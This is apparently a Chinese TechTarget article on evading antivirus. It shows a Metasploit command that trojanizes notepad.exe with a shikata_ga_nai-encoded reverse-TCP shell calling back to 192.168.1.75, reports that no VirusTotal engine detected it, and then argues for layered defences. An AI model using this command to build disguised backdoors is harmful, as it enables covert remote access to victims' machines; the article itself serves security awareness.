在《防病毒规避技术轻松逃避防病毒软件检测(一)》中,笔者使用模糊处理来规避检测,本文他将使用渗透测试框架封装漏洞。 使用渗透测试框架封装漏洞 笔者的下一个测试使用了流行的Metasploit社区版渗透测试框架。该工具因其开放贡献式的开发和灵活性而闻名。封装漏洞或进入文件的后门程序功能是几年前增加的关键功能,该功能可以应用到渗透测试中。
很多流行的文件格式可以通过该工具来创建,包括PDF和所有标准微软Office格式。该工具还可以从默认微软windows程序文件中获取模板,生成可执行文件。毫无戒心的用户很可能会运行“notepad.exe”,并不会发现它已经被修改。这就是渗透测试者如何规避……
我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。
我原创,你原创,我们的内容世界才会更加精彩!
【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】
微信公众号
TechTarget
官方微博
TechTarget中国
在《防病毒规避技术轻松逃避防病毒软件检测(一)》中,笔者使用模糊处理来规避检测,本文他将使用渗透测试框架封装漏洞。
使用渗透测试框架封装漏洞
笔者的下一个测试使用了流行的Metasploit社区版渗透测试框架。该工具因其开放贡献式的开发和灵活性而闻名。封装漏洞或进入文件的后门程序功能是几年前增加的关键功能,该功能可以应用到渗透测试中。很多流行的文件格式可以通过该工具来创建,包括PDF和所有标准微软Office格式。该工具还可以从默认微软windows程序文件中获取模板,生成可执行文件。毫无戒心的用户很可能会运行“notepad.exe”,并不会发现它已经被修改。这就是渗透测试者如何规避防病毒引擎,以及模拟恶意软件编写者如何生成逼真的恶意代码。
笔者通过以下命令运行了几个标准微软Windows可执行文件来测试防病毒软件检测率:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
这被输送到编码器,它使用shikata ga nai编码器输送五次,在日语中是“没办法”的意思,在这里也指Metasploit用以创建可执行文件的多态XOR添加反馈编码器。最后的notepad2.exe通过使用notepad.exe作为模板来生成。受害者将执行notepad2.exe以及创建到192.167.1.75的C&C服务器的后门连接。
然后我们上传和扫描notepad2.exe来测试前面测试中的相同防病毒引擎的检测功能。Virustotal.com的所有46个防病毒引擎都完全没有通过这个测试,没有任何一个引擎(包括微软、赛门铁克和McAfee)检测出编码在该文件中的后门程序。但这并不奇怪。这个结果是我们意料之中的,它证明了基于签名的防病毒引擎的局限性—防病毒引擎必须之前看过恶意软件才可能检测出它。
请注意,这些测试都是非科学性的,这并不意味着防病毒软件无法抵御恶意软件攻击。但这表明,防病毒软件只是用以保护企业计算资产的整个深度防御战略的一部分,正如赛门铁克在对纽约时报文章的回应声明中所写的。
不止反恶意软件 还要增加其它技术
最后首席信息安全官现在应该采取行动,让企业考虑除了反恶意软件系统,还要增加额外的安全技术。例如,反恶意软件可以结合白名单,这样只有经批准的程序可以在客户端机器上运行。下一代防火墙、IPS/IDS和web过滤系统都可以用于检测异常网络流量,因为异常流量几乎总是伴随着恶意软件感染。当然,如果没有人的干预,没有哪个系统能够保证其效力,所以企业需要部署一个专业的安全人员来负责监控企业所使用的安全系统。
最近防病毒软件已经饱受批评,这使人们开始质疑防病毒软件是不是没用。防病毒软件是有用的,但它只是整体防御战略的一部分。即使是最基本的攻击都可以轻而易举的有效模糊化,正如上面所述,这进一步证明,有效的信息安全永远不应该只是依赖于一种产品或者安全层,而应该依赖于多层和多种技术来进行全面的风险管理。纽约时报事件和其他类似事件应该作为催化剂,推动企业部署新出现的反恶意软件。
翻译
相关推荐
-
谷歌Zero研究人员揭卡巴斯基防病毒软件中存SSL证书验证漏洞
近日谷歌Zero项目研究人员Tavis Ormandy报告了两个严重漏洞,其中包括卡巴斯基实验室主流防病毒产品中的SSL证书验证漏洞。
-
防病毒规避技术轻松逃避防病毒软件检测(一)
目前这个秘密已经公开:最近业界最大的防病毒供应商被发现未能检测和阻止高级持续性攻击,因为防病毒规避技术轻松逃避防病毒软件检测。
-
防病毒程序还有存在的价值吗?
当前,防病毒软件正在逐步陷入恶性循环中。不管合理与否,我们都需要退一步,找出解决这一问题的办法。
-
如何分析MSSP日志文件发现IT安全事件
通常企业会利用MSSP收集各种日志文件。但是,在每种日志类型中,值得注意的各种类型的事件数量巨大。如何才能有效的分析这些日志文件,发现IT安全事件呢?